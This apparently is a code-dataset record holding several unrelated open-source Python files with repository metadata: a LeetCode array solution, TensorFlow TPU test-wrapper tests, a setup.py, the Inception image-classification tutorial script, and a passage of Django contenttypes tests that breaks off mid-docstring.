2018-01-13T07:15:37.000Z
|
2022-02-20T12:58:24.000Z
|
Python/remove-duplicates-from-sorted-array-ii.py
|
ambershen/LeetCode
|
0c53580697b05fadb3981d97bd25f1d9da65fd2f
|
[
"MIT"
] | 2
|
2021-12-10T01:43:37.000Z
|
2021-12-14T21:48:53.000Z
|
Python/remove-duplicates-from-sorted-array-ii.py
|
ambershen/LeetCode
|
0c53580697b05fadb3981d97bd25f1d9da65fd2f
|
[
"MIT"
] | 63
|
2017-04-10T03:38:25.000Z
|
2022-03-17T23:24:51.000Z
|
# Time: O(n)
# Space: O(1)
#
# Follow up for "Remove Duplicates":
# What if duplicates are allowed at most twice?
#
# For example,
# Given sorted array A = [1,1,1,2,2,3],
#
# Your function should return length = 5, and A is now [1,1,2,2,3].
#
class Solution:
    # @param a list of integers
    # @return an integer
    def removeDuplicates(self, A):
        """Compact the sorted list A in place so each value appears at most
        twice; returns the compacted length (A[:length] holds the result)."""
        if not A:
            return 0
        tail = 0          # index of the last element kept so far
        dup_kept = False  # True if A[tail] already duplicates its predecessor
        for idx in range(1, len(A)):
            current = A[idx]
            # Skip only a third-or-later copy of the current value.
            if current == A[tail] and dup_kept:
                continue
            dup_kept = current == A[tail]
            tail += 1
            A[tail] = current
        return tail + 1
if __name__ == "__main__":
    # Bug fix: the original used the Python-2-only print statement, which is
    # a SyntaxError under Python 3; print() works on both.
    print(Solution().removeDuplicates([1, 1, 1, 2, 2, 3]))
| 23.34375
| 67
| 0.499331
|
794b194c4d5d126c47e8fbb8739f05a11b63d189
| 6,678
|
py
|
Python
|
tensorflow/python/tpu/tpu_test_wrapper_test.py
|
kartikburmee25/tensorflow-upstream
|
1aecc51dfb26a61cbf32291cfa47e88bc02e4c04
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/tpu/tpu_test_wrapper_test.py
|
kartikburmee25/tensorflow-upstream
|
1aecc51dfb26a61cbf32291cfa47e88bc02e4c04
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/tpu/tpu_test_wrapper_test.py
|
kartikburmee25/tensorflow-upstream
|
1aecc51dfb26a61cbf32291cfa47e88bc02e4c04
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for tpu_test_wrapper.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib.util # Python 3 only.
import os
from absl.testing import flagsaver
from tensorflow.python.platform import flags
from tensorflow.python.platform import test
from tensorflow.python.tpu import tpu_test_wrapper
class TPUTestWrapperTest(test.TestCase):
  """Unit tests for the helpers in tpu_test_wrapper."""

  @flagsaver.flagsaver()
  def test_flags_undefined(self):
    tpu_test_wrapper.maybe_define_flags()

    self.assertIn('tpu', flags.FLAGS)
    self.assertIn('zone', flags.FLAGS)
    self.assertIn('project', flags.FLAGS)
    self.assertIn('model_dir', flags.FLAGS)

  @flagsaver.flagsaver()
  def test_flags_already_defined_not_overridden(self):
    flags.DEFINE_string('tpu', 'tpuname', 'helpstring')

    tpu_test_wrapper.maybe_define_flags()

    self.assertIn('tpu', flags.FLAGS)
    self.assertIn('zone', flags.FLAGS)
    self.assertIn('project', flags.FLAGS)
    self.assertIn('model_dir', flags.FLAGS)
    # The pre-existing definition must win over the wrapper's default.
    self.assertEqual(flags.FLAGS.tpu, 'tpuname')

  @flagsaver.flagsaver(bazel_repo_root='tensorflow/python')
  def test_parent_path(self):
    filepath = '/filesystem/path/tensorflow/python/tpu/example_test.runfiles/tensorflow/python/tpu/example_test'  # pylint: disable=line-too-long
    self.assertEqual(
        tpu_test_wrapper.calculate_parent_python_path(filepath),
        'tensorflow.python.tpu')

  @flagsaver.flagsaver(bazel_repo_root='tensorflow/python')
  def test_parent_path_raises(self):
    filepath = '/bad/path'
    with self.assertRaisesWithLiteralMatch(
        ValueError,
        'Filepath "/bad/path" does not contain repo root "tensorflow/python"'):
      tpu_test_wrapper.calculate_parent_python_path(filepath)

  def test_is_test_class_positive(self):

    class A(test.TestCase):
      pass

    self.assertTrue(tpu_test_wrapper._is_test_class(A))

  def test_is_test_class_negative(self):

    class A(object):
      pass

    self.assertFalse(tpu_test_wrapper._is_test_class(A))

  @flagsaver.flagsaver(
      wrapped_tpu_test_module_relative='.tpu_test_wrapper_test')
  def test_move_test_classes_into_scope(self):
    # Test the class importer by having the wrapper module import this test
    # into itself.
    with test.mock.patch.object(
        tpu_test_wrapper, 'calculate_parent_python_path') as mock_parent_path:
      mock_parent_path.return_value = (
          tpu_test_wrapper.__name__.rpartition('.')[0])
      module = tpu_test_wrapper.import_user_module()
    tpu_test_wrapper.move_test_classes_into_scope(module)

    self.assertEqual(
        tpu_test_wrapper.tpu_test_imported_TPUTestWrapperTest.__name__,
        self.__class__.__name__)

  @flagsaver.flagsaver(test_dir_base='gs://example-bucket/tempfiles')
  def test_set_random_test_dir(self):
    tpu_test_wrapper.maybe_define_flags()
    tpu_test_wrapper.set_random_test_dir()

    self.assertStartsWith(flags.FLAGS.model_dir,
                          'gs://example-bucket/tempfiles')
    # A random suffix must have been appended to the base dir.
    self.assertGreater(
        len(flags.FLAGS.model_dir), len('gs://example-bucket/tempfiles'))

  @flagsaver.flagsaver(test_dir_base='gs://example-bucket/tempfiles')
  def test_set_random_test_dir_repeatable(self):
    tpu_test_wrapper.maybe_define_flags()
    tpu_test_wrapper.set_random_test_dir()
    first = flags.FLAGS.model_dir
    tpu_test_wrapper.set_random_test_dir()
    second = flags.FLAGS.model_dir

    # Two consecutive calls must produce distinct directories.
    self.assertNotEqual(first, second)

  def test_run_user_main(self):
    # run_user_main must execute only the module's __main__ guard body.
    test_module = _write_and_load_module("""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
VARS = 1
if 'unrelated_if' == 'should_be_ignored':
  VARS = 2
if __name__ == '__main__':
  VARS = 3
if 'extra_if_at_bottom' == 'should_be_ignored':
  VARS = 4
""")
    self.assertEqual(test_module.VARS, 1)
    tpu_test_wrapper.run_user_main(test_module)
    self.assertEqual(test_module.VARS, 3)

  def test_run_user_main_missing_if(self):
    # A module without a __main__ guard is rejected.
    test_module = _write_and_load_module("""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
VARS = 1
""")
    self.assertEqual(test_module.VARS, 1)
    with self.assertRaises(NotImplementedError):
      tpu_test_wrapper.run_user_main(test_module)

  def test_run_user_main_double_quotes(self):
    # Same as test_run_user_main but with a double-quoted __main__ guard.
    test_module = _write_and_load_module("""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
VARS = 1
if "unrelated_if" == "should_be_ignored":
  VARS = 2
if __name__ == "__main__":
  VARS = 3
if "extra_if_at_bottom" == "should_be_ignored":
  VARS = 4
""")
    self.assertEqual(test_module.VARS, 1)
    tpu_test_wrapper.run_user_main(test_module)
    self.assertEqual(test_module.VARS, 3)

  def test_run_user_main_test(self):
    test_module = _write_and_load_module("""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.platform import test as unique_name
class DummyTest(unique_name.TestCase):
  def test_fail(self):
    self.fail()
if __name__ == '__main__':
  unique_name.main()
""")
    # We're actually limited in what we can test here -- we can't call
    # test.main() without deleting this current test from locals(), or we'll
    # recurse infinitely. We settle for testing that the test imports and calls
    # the right test module.
    with test.mock.patch.object(test, 'main') as mock_main:
      tpu_test_wrapper.run_user_main(test_module)
    # NOTE(review): the call assertion below is commented out; consider
    # re-enabling it so this test actually verifies the dispatch.
    #mock_main.assert_called_once()
def _write_and_load_module(source):
  """Writes `source` to a temp file and imports it as module 'testmodule'.

  Returns the freshly executed module object.
  """
  path = os.path.join(test.get_temp_dir(), 'testmod.py')
  with open(path, 'w') as out:
    out.write(source)
  spec = importlib.util.spec_from_file_location('testmodule', path)
  module = importlib.util.module_from_spec(spec)
  spec.loader.exec_module(module)
  return module
if __name__ == '__main__':
  # Delegate to the TensorFlow test runner.
  test.main()
| 31.205607
| 145
| 0.742288
|
794b1bb8e4d87704861028b82f6d0f655a6aa6c4
| 845
|
py
|
Python
|
setup.py
|
aced-differentiate/dft-input-gen
|
14bee323517714c433682bad2dcb897b223dd5ec
|
[
"Apache-2.0"
] | 1
|
2021-04-15T09:54:52.000Z
|
2021-04-15T09:54:52.000Z
|
setup.py
|
CitrineInformatics/dft-input-gen
|
14bee323517714c433682bad2dcb897b223dd5ec
|
[
"Apache-2.0"
] | 1
|
2021-01-28T22:12:07.000Z
|
2021-01-28T22:12:07.000Z
|
setup.py
|
aced-differentiate/dft-input-gen
|
14bee323517714c433682bad2dcb897b223dd5ec
|
[
"Apache-2.0"
] | 2
|
2020-12-08T18:14:13.000Z
|
2020-12-18T19:01:11.000Z
|
import os

from setuptools import find_packages
from setuptools import setup

# Single-source the package version from src/dftinputgen/VERSION.txt.
_version_path = os.path.join(
    os.path.dirname(__file__), "src", "dftinputgen", "VERSION.txt"
)
with open(_version_path) as version_file:
    version = version_file.read().strip()

setup(
    name="dftinputgen",
    version=version,
    description="Unopinionated library to generate input files for DFT codes",
    url="https://github.com/CitrineInformatics/dft-input-gen",
    author="Vinay Hegde",
    author_email="vhegde@citrine.io",
    packages=find_packages(where="src"),
    package_dir={"": "src"},
    include_package_data=True,
    install_requires=["six", "numpy", "ase <= 3.17"],
    entry_points={"console_scripts": ["dftinputgen = dftinputgen.cli:driver"]},
    classifiers=[
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3.8",
    ],
)
| 27.258065
| 79
| 0.657988
|
794b1bea3a9df2094b8b5a3e0f65233c8aca150e
| 9,428
|
py
|
Python
|
tutorials/image/imagenet/classify_image.py
|
JennieYuanChang/object_detection
|
289d68d309a6afabc5119600fdb5942509ca9fe8
|
[
"Apache-2.0"
] | null | null | null |
tutorials/image/imagenet/classify_image.py
|
JennieYuanChang/object_detection
|
289d68d309a6afabc5119600fdb5942509ca9fe8
|
[
"Apache-2.0"
] | null | null | null |
tutorials/image/imagenet/classify_image.py
|
JennieYuanChang/object_detection
|
289d68d309a6afabc5119600fdb5942509ca9fe8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple image classification with Inception.
Run image classification with Inception trained on ImageNet 2012 Challenge data
set.
This program creates a graph from a saved GraphDef protocol buffer,
and runs inference on an input JPEG image. It outputs human readable
strings of the top 5 predictions along with their probabilities.
Change the --image_file argument to any jpg image to compute a
classification of that image.
Please see the tutorial and website for a detailed description of how
to use this script to perform image recognition.
https://tensorflow.org/tutorials/image_recognition/
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os.path
import re
import sys
import tarfile
import numpy as np
from six.moves import urllib
import tensorflow as tf
FLAGS = None
# pylint: disable=line-too-long
DATA_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
# pylint: enable=line-too-long
class NodeLookup(object):
"""Converts integer node ID's to human readable labels."""
def __init__(self,FLAGS,
label_lookup_path=None,
uid_lookup_path=None):
if not label_lookup_path:
label_lookup_path = os.path.join(
FLAGS.model_dir, 'imagenet_2012_challenge_label_map_proto.pbtxt')
if not uid_lookup_path:
uid_lookup_path = os.path.join(
FLAGS.model_dir, 'imagenet_synset_to_human_label_map.txt')
self.node_lookup = self.load(label_lookup_path, uid_lookup_path)
def load(self, label_lookup_path, uid_lookup_path):
"""Loads a human readable English name for each softmax node.
Args:
label_lookup_path: string UID to integer node ID.
uid_lookup_path: string UID to human-readable string.
Returns:
dict from integer node ID to human-readable string.
"""
if not tf.gfile.Exists(uid_lookup_path):
tf.logging.fatal('File does not exist %s', uid_lookup_path)
if not tf.gfile.Exists(label_lookup_path):
tf.logging.fatal('File does not exist %s', label_lookup_path)
# Loads mapping from string UID to human-readable string
proto_as_ascii_lines = tf.gfile.GFile(uid_lookup_path).readlines()
uid_to_human = {}
p = re.compile(r'[n\d]*[ \S,]*')
for line in proto_as_ascii_lines:
parsed_items = p.findall(line)
uid = parsed_items[0]
human_string = parsed_items[2]
uid_to_human[uid] = human_string
# Loads mapping from string UID to integer node ID.
node_id_to_uid = {}
proto_as_ascii = tf.gfile.GFile(label_lookup_path).readlines()
for line in proto_as_ascii:
if line.startswith(' target_class:'):
target_class = int(line.split(': ')[1])
if line.startswith(' target_class_string:'):
target_class_string = line.split(': ')[1]
node_id_to_uid[target_class] = target_class_string[1:-2]
# Loads the final mapping of integer node ID to human-readable string
node_id_to_name = {}
for key, val in node_id_to_uid.items():
if val not in uid_to_human:
tf.logging.fatal('Failed to locate: %s', val)
name = uid_to_human[val]
node_id_to_name[key] = name
return node_id_to_name
def id_to_string(self, node_id):
if node_id not in self.node_lookup:
return ''
return self.node_lookup[node_id]
def create_graph(FLAGS):
"""Creates a graph from saved GraphDef file and returns a saver."""
# Creates graph from saved graph_def.pb.
with tf.gfile.FastGFile(os.path.join(
FLAGS.model_dir, 'classify_image_graph_def.pb'), 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
def run_inference_on_image(image,FLAGS):
"""Runs inference on an image.
Args:
image: Image file name.
Returns:
Nothing
"""
if not tf.gfile.Exists(image):
tf.logging.fatal('File does not exist %s', image)
image_data = tf.gfile.FastGFile(image, 'rb').read()
# Creates graph from saved GraphDef.
create_graph(FLAGS)
with tf.Session() as sess:
# Some useful tensors:
# 'softmax:0': A tensor containing the normalized prediction across
# 1000 labels.
# 'pool_3:0': A tensor containing the next-to-last layer containing 2048
# float description of the image.
# 'DecodeJpeg/contents:0': A tensor containing a string providing JPEG
# encoding of the image.
# Runs the softmax tensor by feeding the image_data as input to the graph.
softmax_tensor = sess.graph.get_tensor_by_name('softmax:0')
predictions = sess.run(softmax_tensor,
{'DecodeJpeg/contents:0': image_data})
predictions = np.squeeze(predictions)
# Creates node ID --> English string lookup.
node_lookup = NodeLookup(FLAGS)
top_k = predictions.argsort()[-FLAGS.num_top_predictions:][::-1]
result = []
for node_id in top_k:
human_string = node_lookup.id_to_string(node_id)
score = predictions[node_id]
result.append({"keyword":human_string, "score":np.float64(score)})
print('%s (score = %.5f)' % (human_string, np.float64(score)))
return result
def maybe_download_and_extract(FLAGS):
"""Download and extract model tar file."""
dest_directory = FLAGS.model_dir
if not os.path.exists(dest_directory):
os.makedirs(dest_directory)
filename = DATA_URL.split('/')[-1]
filepath = os.path.join(dest_directory, filename)
if not os.path.exists(filepath):
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %s %.1f%%' % (
filename, float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
filepath, _ = urllib.request.urlretrieve(DATA_URL, filepath, _progress)
print()
statinfo = os.stat(filepath)
print('Successfully downloaded', filename, statinfo.st_size, 'bytes.')
tarfile.open(filepath, 'r:gz').extractall(dest_directory)
def main(imgfile):
parser = argparse.ArgumentParser()
# classify_image_graph_def.pb:
# Binary representation of the GraphDef protocol buffer.
# imagenet_synset_to_human_label_map.txt:
# Map from synset ID to a human readable string.
# imagenet_2012_challenge_label_map_proto.pbtxt:
# Text representation of a protocol buffer mapping a label to synset ID.
parser.add_argument(
'--model_dir',
type=str,
default='/tmp/imagenet',
help="""\
Path to classify_image_graph_def.pb,
imagenet_synset_to_human_label_map.txt, and
imagenet_2012_challenge_label_map_proto.pbtxt.\
"""
)
parser.add_argument(
'--image_file',
type=str,
default=imgfile,
help='Absolute path to image file.'
)
parser.add_argument(
'--num_top_predictions',
type=int,
default=5,
help='Display this many predictions.'
)
FLAGS, unparsed = parser.parse_known_args()
print("flagflagflag")
print(FLAGS)
# classify_image_graph_def.pb:
# Binary representation of the GraphDef protocol buffer.
# imagenet_synset_to_human_label_map.txt:
# Map from synset ID to a human readable string.
# imagenet_2012_challenge_label_map_proto.pbtxt:
# Text representation of a protocol buffer mapping a label to synset ID.
maybe_download_and_extract(FLAGS)
image = (FLAGS.image_file if FLAGS.image_file else
os.path.join(FLAGS.model_dir, 'cropped_panda.jpg'))
return run_inference_on_image(image,FLAGS)
if __name__ == '__main__':
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
print("I AM YOUR FATHER")
parser = argparse.ArgumentParser()
# classify_image_graph_def.pb:
# Binary representation of the GraphDef protocol buffer.
# imagenet_synset_to_human_label_map.txt:
# Map from synset ID to a human readable string.
# imagenet_2012_challenge_label_map_proto.pbtxt:
# Text representation of a protocol buffer mapping a label to synset ID.
parser.add_argument(
'--model_dir',
type=str,
default='/tmp/imagenet',
help="""\
Path to classify_image_graph_def.pb,
imagenet_synset_to_human_label_map.txt, and
imagenet_2012_challenge_label_map_proto.pbtxt.\
"""
)
parser.add_argument(
'--image_file',
type=str,
default='',
help='Absolute path to image file.'
)
parser.add_argument(
'--num_top_predictions',
type=int,
default=5,
help='Display this many predictions.'
)
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| 33.671429
| 90
| 0.700891
|
794b1e34ef6bcc5cf87a180e19b42e89714d9cfc
| 22,812
|
py
|
Python
|
tests/contenttypes_tests/tests.py
|
kkoralsky/django
|
924af638e4d4fb8eb46a19ac0cafcb2e83480cf3
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/contenttypes_tests/tests.py
|
kkoralsky/django
|
924af638e4d4fb8eb46a19ac0cafcb2e83480cf3
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/contenttypes_tests/tests.py
|
kkoralsky/django
|
924af638e4d4fb8eb46a19ac0cafcb2e83480cf3
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 1
|
2020-02-06T10:31:51.000Z
|
2020-02-06T10:31:51.000Z
|
import datetime
from unittest import mock
from django.apps.registry import Apps, apps
from django.conf import settings
from django.contrib.contenttypes import management as contenttypes_management
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.core import checks, management
from django.core.management import call_command
from django.db import connections, migrations, models
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, override_settings,
)
from django.test.utils import captured_stdout, isolate_apps
from .models import (
Article, Author, ModelWithNullFKToSite, Post, SchemeIncludedURL,
Site as MockSite,
)
@override_settings(ROOT_URLCONF='contenttypes_tests.urls')
class ContentTypesViewsTests(TestCase):
@classmethod
def setUpTestData(cls):
# don't use the manager because we want to ensure the site exists
# with pk=1, regardless of whether or not it already exists.
cls.site1 = Site(pk=1, domain='testserver', name='testserver')
cls.site1.save()
cls.author1 = Author.objects.create(name='Boris')
cls.article1 = Article.objects.create(
title='Old Article', slug='old_article', author=cls.author1,
date_created=datetime.datetime(2001, 1, 1, 21, 22, 23)
)
cls.article2 = Article.objects.create(
title='Current Article', slug='current_article', author=cls.author1,
date_created=datetime.datetime(2007, 9, 17, 21, 22, 23)
)
cls.article3 = Article.objects.create(
title='Future Article', slug='future_article', author=cls.author1,
date_created=datetime.datetime(3000, 1, 1, 21, 22, 23)
)
cls.scheme1 = SchemeIncludedURL.objects.create(url='http://test_scheme_included_http/')
cls.scheme2 = SchemeIncludedURL.objects.create(url='https://test_scheme_included_https/')
cls.scheme3 = SchemeIncludedURL.objects.create(url='//test_default_scheme_kept/')
def setUp(self):
Site.objects.clear_cache()
def test_shortcut_with_absolute_url(self):
"Can view a shortcut for an Author object that has a get_absolute_url method"
for obj in Author.objects.all():
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, obj.pk)
response = self.client.get(short_url)
self.assertRedirects(response, 'http://testserver%s' % obj.get_absolute_url(),
status_code=302, target_status_code=404)
def test_shortcut_with_absolute_url_including_scheme(self):
"""
Can view a shortcut when object's get_absolute_url returns a full URL
the tested URLs are: "http://...", "https://..." and "//..."
"""
for obj in SchemeIncludedURL.objects.all():
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(SchemeIncludedURL).id, obj.pk)
response = self.client.get(short_url)
self.assertRedirects(response, obj.get_absolute_url(),
status_code=302,
fetch_redirect_response=False)
def test_shortcut_no_absolute_url(self):
"Shortcuts for an object that has no get_absolute_url method raises 404"
for obj in Article.objects.all():
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Article).id, obj.pk)
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
def test_wrong_type_pk(self):
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, 'nobody/expects')
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
def test_shortcut_bad_pk(self):
short_url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, '42424242')
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
def test_nonint_content_type(self):
an_author = Author.objects.all()[0]
short_url = '/shortcut/%s/%s/' % ('spam', an_author.pk)
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
def test_bad_content_type(self):
an_author = Author.objects.all()[0]
short_url = '/shortcut/%s/%s/' % (42424242, an_author.pk)
response = self.client.get(short_url)
self.assertEqual(response.status_code, 404)
@mock.patch('django.apps.apps.get_model')
def test_shortcut_view_with_null_site_fk(self, get_model):
"""
The shortcut view works if a model's ForeignKey to site is None.
"""
get_model.side_effect = lambda *args, **kwargs: MockSite if args[0] == 'sites.Site' else ModelWithNullFKToSite
obj = ModelWithNullFKToSite.objects.create(title='title')
url = '/shortcut/%s/%s/' % (ContentType.objects.get_for_model(ModelWithNullFKToSite).id, obj.pk)
response = self.client.get(url)
self.assertRedirects(
response, '%s' % obj.get_absolute_url(),
fetch_redirect_response=False,
)
def test_create_contenttype_on_the_spot(self):
"""
Make sure ContentTypeManager.get_for_model creates the corresponding
content type if it doesn't exist in the database (for some reason).
"""
class ModelCreatedOnTheFly(models.Model):
name = models.CharField()
class Meta:
verbose_name = 'a model created on the fly'
app_label = 'my_great_app'
apps = Apps()
ct = ContentType.objects.get_for_model(ModelCreatedOnTheFly)
self.assertEqual(ct.app_label, 'my_great_app')
self.assertEqual(ct.model, 'modelcreatedonthefly')
self.assertEqual(str(ct), 'modelcreatedonthefly')
@override_settings(SILENCED_SYSTEM_CHECKS=['fields.W342']) # ForeignKey(unique=True)
@isolate_apps('contenttypes_tests', attr_name='apps')
class GenericForeignKeyTests(SimpleTestCase):
def test_str(self):
class Model(models.Model):
field = GenericForeignKey()
self.assertEqual(str(Model.field), "contenttypes_tests.Model.field")
def test_missing_content_type_field(self):
class TaggedItem(models.Model):
# no content_type field
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
errors = TaggedItem.content_object.check()
expected = [
checks.Error(
"The GenericForeignKey content type references the non-existent field 'TaggedItem.content_type'.",
obj=TaggedItem.content_object,
id='contenttypes.E002',
)
]
self.assertEqual(errors, expected)
def test_invalid_content_type_field(self):
class Model(models.Model):
content_type = models.IntegerField() # should be ForeignKey
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey(
'content_type', 'object_id')
errors = Model.content_object.check()
expected = [
checks.Error(
"'Model.content_type' is not a ForeignKey.",
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=Model.content_object,
id='contenttypes.E003',
)
]
self.assertEqual(errors, expected)
def test_content_type_field_pointing_to_wrong_model(self):
class Model(models.Model):
content_type = models.ForeignKey('self', models.CASCADE) # should point to ContentType
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey(
'content_type', 'object_id')
errors = Model.content_object.check()
expected = [
checks.Error(
"'Model.content_type' is not a ForeignKey to 'contenttypes.ContentType'.",
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=Model.content_object,
id='contenttypes.E004',
)
]
self.assertEqual(errors, expected)
def test_missing_object_id_field(self):
class TaggedItem(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
# missing object_id field
content_object = GenericForeignKey()
errors = TaggedItem.content_object.check()
expected = [
checks.Error(
"The GenericForeignKey object ID references the non-existent field 'object_id'.",
obj=TaggedItem.content_object,
id='contenttypes.E001',
)
]
self.assertEqual(errors, expected)
def test_field_name_ending_with_underscore(self):
class Model(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object_ = GenericForeignKey(
'content_type', 'object_id')
errors = Model.content_object_.check()
expected = [
checks.Error(
'Field names must not end with an underscore.',
obj=Model.content_object_,
id='fields.E001',
)
]
self.assertEqual(errors, expected)
@override_settings(INSTALLED_APPS=['django.contrib.auth', 'django.contrib.contenttypes', 'contenttypes_tests'])
def test_generic_foreign_key_checks_are_performed(self):
class Model(models.Model):
content_object = GenericForeignKey()
with mock.patch.object(GenericForeignKey, 'check') as check:
checks.run_checks(app_configs=self.apps.get_app_configs())
check.assert_called_once_with()
@isolate_apps('contenttypes_tests')
class GenericRelationshipTests(SimpleTestCase):
def test_valid_generic_relationship(self):
class TaggedItem(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
class Bookmark(models.Model):
tags = GenericRelation('TaggedItem')
errors = Bookmark.tags.field.check()
self.assertEqual(errors, [])
def test_valid_generic_relationship_with_explicit_fields(self):
class TaggedItem(models.Model):
custom_content_type = models.ForeignKey(ContentType, models.CASCADE)
custom_object_id = models.PositiveIntegerField()
content_object = GenericForeignKey(
'custom_content_type', 'custom_object_id')
class Bookmark(models.Model):
tags = GenericRelation(
'TaggedItem',
content_type_field='custom_content_type',
object_id_field='custom_object_id',
)
errors = Bookmark.tags.field.check()
self.assertEqual(errors, [])
def test_pointing_to_missing_model(self):
class Model(models.Model):
rel = GenericRelation('MissingModel')
errors = Model.rel.field.check()
expected = [
checks.Error(
"Field defines a relation with model 'MissingModel', "
"which is either not installed, or is abstract.",
obj=Model.rel.field,
id='fields.E300',
)
]
self.assertEqual(errors, expected)
def test_valid_self_referential_generic_relationship(self):
class Model(models.Model):
rel = GenericRelation('Model')
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey(
'content_type', 'object_id')
errors = Model.rel.field.check()
self.assertEqual(errors, [])
def test_missing_generic_foreign_key(self):
class TaggedItem(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
class Bookmark(models.Model):
tags = GenericRelation('TaggedItem')
errors = Bookmark.tags.field.check()
expected = [
checks.Error(
"The GenericRelation defines a relation with the model "
"'contenttypes_tests.TaggedItem', but that model does not have a "
"GenericForeignKey.",
obj=Bookmark.tags.field,
id='contenttypes.E004',
)
]
self.assertEqual(errors, expected)
@override_settings(TEST_SWAPPED_MODEL='contenttypes_tests.Replacement')
def test_pointing_to_swapped_model(self):
class Replacement(models.Model):
pass
class SwappedModel(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
class Meta:
swappable = 'TEST_SWAPPED_MODEL'
class Model(models.Model):
rel = GenericRelation('SwappedModel')
errors = Model.rel.field.check()
expected = [
checks.Error(
"Field defines a relation with the model "
"'contenttypes_tests.SwappedModel', "
"which has been swapped out.",
hint="Update the relation to point at 'settings.TEST_SWAPPED_MODEL'.",
obj=Model.rel.field,
id='fields.E301',
)
]
self.assertEqual(errors, expected)
def test_field_name_ending_with_underscore(self):
class TaggedItem(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
class InvalidBookmark(models.Model):
tags_ = GenericRelation('TaggedItem')
errors = InvalidBookmark.tags_.field.check()
expected = [
checks.Error(
'Field names must not end with an underscore.',
obj=InvalidBookmark.tags_.field,
id='fields.E001',
)
]
self.assertEqual(errors, expected)
class UpdateContentTypesTests(TestCase):
def setUp(self):
self.before_count = ContentType.objects.count()
self.content_type = ContentType.objects.create(app_label='contenttypes_tests', model='Fake')
self.app_config = apps.get_app_config('contenttypes_tests')
def test_interactive_true_with_dependent_objects(self):
"""
interactive mode of remove_stale_contenttypes (the default) should
delete stale contenttypes and warn of dependent objects.
"""
post = Post.objects.create(title='post', content_type=self.content_type)
# A related object is needed to show that a custom collector with
# can_fast_delete=False is needed.
ModelWithNullFKToSite.objects.create(post=post)
with mock.patch('builtins.input', return_value='yes'):
with captured_stdout() as stdout:
call_command('remove_stale_contenttypes', verbosity=2, stdout=stdout)
self.assertEqual(Post.objects.count(), 0)
output = stdout.getvalue()
self.assertIn('- Content type for contenttypes_tests.Fake', output)
self.assertIn('- 1 contenttypes_tests.Post object(s)', output)
self.assertIn('- 1 contenttypes_tests.ModelWithNullFKToSite', output)
self.assertIn('Deleting stale content type', output)
self.assertEqual(ContentType.objects.count(), self.before_count)
def test_interactive_true_without_dependent_objects(self):
"""
interactive mode of remove_stale_contenttypes (the default) should
delete stale contenttypes even if there aren't any dependent objects.
